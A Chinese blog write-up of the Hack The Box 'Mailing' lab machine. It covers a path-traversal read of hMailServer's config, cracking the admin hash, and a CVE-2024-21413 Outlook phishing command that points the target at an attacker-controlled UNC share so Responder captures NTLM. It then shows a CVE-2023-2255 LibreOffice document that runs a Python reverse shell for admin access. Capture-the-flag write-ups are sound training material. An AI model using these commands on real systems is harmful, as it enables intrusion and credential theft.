htb_Mailing

最新推荐文章于 2024-07-25 15:50:18 发布
最新推荐文章于 2024-07-25 15:50:18 发布
阅读量495 收藏 5
点赞数 3
分类专栏: hack the box 文章标签: 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62621015/article/details/139511865
版权

在这里插入图片描述

端口扫描
在这里插入图片描述

主页有一个download按键
在这里插入图片描述

点击后下载了一个pdf
在这里插入图片描述

大致看了一下,就是一个使用邮件服务器的说明书
不过最后有一个用户名Maya
在这里插入图片描述

目录扫描
在这里插入图片描述

/assests/
一个存图片的地方
在这里插入图片描述
/download.php
需要指定下载文件,大概就是刚刚那个pdf
在这里插入图片描述

返回主页再次下载pdf并抓包
通过get请求传递文件路径
尝试修改文件路径实现任意文件下载
在这里插入图片描述

查看windows配置文件/Windows/win.ini
成功
存在任意文件读取漏洞
在这里插入图片描述
hmailserver服务的配置文件为hMailServer.ini,尝试读取
在这里插入图片描述
寻找hMilServer服务的绝对路径

直接尝试默认安装路径

C:\Program Files (x86)\hMailServer\Bin\hMailServer.INI

本来就是在C:\下,因此路径为../../../../../Program Files (x86)\hMailServer\Bin\hMailServer.INI

嘿嘿

读出来了
在这里插入图片描述

841bb5acfa6779ae432fd7a4e6600ba7
0a9f8ad8bf896b501dde74f08efd7e4c

解密
在这里插入图片描述homenetworkingadministrator

搜索后发现可以使用telnet连接pop3
在这里插入图片描述
在这里插入图片描述
需要使用完整email地址,在用户名后加上@mailing.htb

telnet 10.129.57.185 110
USER administrator@mailing.htb
PASS homenetworkingadministrator

在这里插入图片描述

没有邮件
在这里插入图片描述

下一步不知道怎么走,看了别人的提示发现是要利用cve
CVE-2024-21413

Microsoft Office Outlook是微软office的组件之一,也是常用的邮件客户端之一。CVE-2024-21413 是在
Microsoft Outlook 中发现的一个重大安全漏洞,CVSS 评分
9.8。攻击者将一个带恶意链接的邮件发送给被攻击用户,当用户点击链接时,会导致NTLM窃取与远程代码执行(RCE),并且该漏洞还能使攻击者能够绕过Office文档的受保护视图。

正好前面的pdf提到Maya会查阅邮件,使用exp攻击

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.16.22\cc' --subject cccc

得先启动responder监听

responder -I tun0 -v

目录底下得有url里面写的目录
在这里插入图片描述
在这里插入图片描述
将hash复制下来解密

hashcat -m 5600 ntlm.txt

maya/m4y4ngs4ri

evil-winrm登录
在这里插入图片描述
whoami /priv没有可利用的
在这里插入图片描述
netstat -ano也没有找到有用的

查看提示后发现利用点在LibreOffice

版本为7.4
在这里插入图片描述

CVE-2023-2255

生成一个odt文件,若使用管理员权限运行,就能使用管理员权限执行命令
提示中写道Importtant Documents目录有管理员执行权限

icacls C:\"Important Documents"

在这里插入图片描述

正好该靶机有python3,因此弄一个python的反弹shell
在这里插入图片描述
在这里插入图片描述
利用exp生成odt

python3 CVE-2023-2255.py --cmd "python C:\Users\maya\Desktop\shell.py" --output 'shell.odt'

上传靶机
在这里插入图片描述

稍等一会
返回管理员权限shell
在这里插入图片描述

还可以使用crackmapexec导出hash
在这里插入图片描述

川川小宝
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTB Mailroom WriteUp
qq_58869808的博客
04-30 3067
HTB MailRomm Wp
htb-Mailing
whale_waves的博客
05-23 1222
Microsoft Office Outlook是微软office的组件之一,也是常用的邮件客户端之一。CVE-2024-21413 是在 Microsoft Outlook 中发现的一个重大安全漏洞,CVSS 评分 9.8。攻击者将一个带恶意链接的邮件发送给被攻击用户,当用户点击链接时,会导致NTLM窃取与远程代码执行(RCE),并且该漏洞还能使攻击者能够绕过Office文档的受保护视图。本文先讲复现过程,后讲漏洞原理。
HTB 靶场 Mailing 未完待续
m0_62438849的博客
06-04 993
访问网页在/etc/hosts 添加ip和域名hosts 文件包含ip地址与主机名之间的映射,还包括主机的别名。Linux系统所有程序查询/etc/hosts文件解析对主机名或者域名的IP地址。没有找到就需要使用DNS服务器解释域名。
Hack The Box-Mailing
m0_52742680的博客
05-06 2568
HackTheBox S5赛季靶场第三篇
Windows/Mailing
ve9etable的博客
05-13 986
使用 nmap 扫描系统,发现对外开放了如下端口80 端口运行着 iis 服务,老规矩,将 mailing.htb 添加到 /etc/hosts 中。
HTB_tools-开源
05-02
`HTB_tools-开源`是一款专为网络带宽管理设计的开源软件,它致力于简化网络环境中的上传和下载带宽分配的配置过程,同时提供了方便的监控功能。这款工具对于网络管理员来说尤其重要,因为它可以帮助他们高效地管理和...
ROS_HTB_优先限速
09-07
标题与描述中的“ROS_HTB_优先限速”是指在MikroTik RouterOS系统中,使用Hierarchical Token Bucket(HTB)算法进行网络流量的优先级管理和限速设置的一种技术。这一策略通常用于确保关键应用或服务的网络质量,...
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
《Python库htb_cli-0.1.1-py3-none-any.whl详解及应用》 在Python的世界里,库是开发者的重要工具,它们提供了丰富的功能,极大地提升了开发效率。今天我们将聚焦于一个名为`htb_cli`的Python库,其版本为0.1.1,...
htb_challenges:为我所有过于复杂的htb挑战完成内容转储
03-27
htb_challenges 为我所有过于复杂的htb挑战完成内容转储
PyPI 官网下载 | htb_cli-0.1.1-py3-none-any.whl
01-05
资源来自pypi官网。 资源全名:htb_cli-0.1.1-py3-none-any.whl
hMailServer服务器故障处理案例
长安紫薯的专栏
01-04 5401
同事说收发邮件都不行了   但前任管理员什么都没留下。说明文档,管理账户。   手上只有一个账号和访问地址。同事非技术人员,其他都说不清。 账号zhangsan@netunit.cn 密码zhangsan mail.netunit.cn登录可以登录进去。进去看用户配置为: pop3.netunit.cn   端口 110 smtp.netunit.cn 端口 25   处理步骤
邮件服务器 文件 加密,开源邮件服务器hMailServer用户密码加密算法
weixin_42395980的博客
08-02 463
开源邮件服务器hMailServer用户密码加密算法开源邮件服务器 hMailServer 在表 hm_accounts 中保存的密码,不同的账户是可以使用不同的加密算法来加密的。表中保存密码的字段是:accountpassword,而这个密码所使用的加密算法由后面的一个字段的值来决定,这个字段就是:accountpwencryption。当前这个字段的值决定了密码的不同加密算法,下面是其对应关...
hMailServer邮件服务器配置(超详细,附坑解决办法)
热门推荐
11-02 3万+
hMailServer邮件服务器配置 下载hMailServer https://www.hmailserver.com/ 下载win64openssl http://slproweb.com/products/Win32OpenSSL.html 分别安装这两个文件. 安装openssl到最后,会提示是否捐赠,当然不了. 选择数据库,默认就成. 录入管理密码 ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8357
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Linux玩转指南
qq_43535970的博客
07-25 955
Linux是一个类Unix操作系统,最初由Linus Torvalds于1991年发布。它是基于开源的内核,并结合了大量的开源软件,形成了完整的操作系统。Linux的设计理念强调开源和自由,使得它在全球范围内得到广泛应用,从个人电脑到服务器、嵌入式系统,甚至超级计算机。
Linux初学基本命令
最新发布
yuan20010401的博客
07-25 788
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
60个常见的 Linux 指令
yatingliu的博客
07-25 1735
常见 60 个Linux指令学习笔记
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值